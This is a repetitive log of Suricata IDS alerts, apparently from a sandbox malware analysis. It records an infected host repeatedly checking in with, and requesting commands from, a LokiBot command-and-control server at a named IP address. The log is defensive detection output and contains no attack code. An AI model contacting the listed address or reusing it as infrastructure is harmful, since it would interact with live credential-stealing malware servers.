                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50018 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50023 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50032 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50020 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50038 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50032 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49972 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50038 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50006 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50020 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50024 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50038 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50032 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50028 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50010 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50050 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50050 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50028 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50050 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50022 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50028 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50050 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49958 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49958 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50028 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49958 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49964 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49964 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49964 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50055 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50055 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50048 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50055 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50048 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50048 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49964 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50055 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50065 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49841 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50065 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50065 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49841 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49888 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49841 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50048 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50101 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50101 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50101 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49888 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50101 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49888 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49946 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50014 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50014 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50014 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49888 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50037 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50037 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50037 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50083 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50083 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50083 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50037 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50083 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50029 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50029 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50029 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50029 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49917 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50011 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50011 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50011 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50011 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50016 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50053 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50053 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50016 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50053 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50013 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50013 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50013 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50065 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50022 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50013 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50022 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50022 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50061 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50061 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50061 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50061 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50046 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50046 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50046 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50046 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50074 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50074 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50074 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50036 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50074 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50036 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50036 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50084 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50084 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50084 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50036 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50084 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50027 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50079 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50027 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50079 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50027 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50079 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50079 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50027 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50047 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49882 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50047 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49882 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49882 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50047 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49882 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50047 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50014 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50025 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50025 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50025 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50030 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50030 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50030 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50025 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50030 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50075 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50075 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50060 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50060 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50060 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50060 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50096 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50096 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50096 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50096 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50053 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50075 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50056 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50075 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49938 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50063 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49938 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50063 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50063 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50009 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50056 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50009 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49938 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50016 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50063 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50056 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50009 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50087 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50087 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50087 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50059 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49938 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50059 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50019 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50019 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50019 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49999 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50009 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50087 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50080 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50102 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50102 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50102 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50019 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50056 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50080 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50080 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50102 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49999 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50080 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49999 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50033 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50033 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50033 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50021 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50021 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50021 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50042 -> 94.156.177.41:80
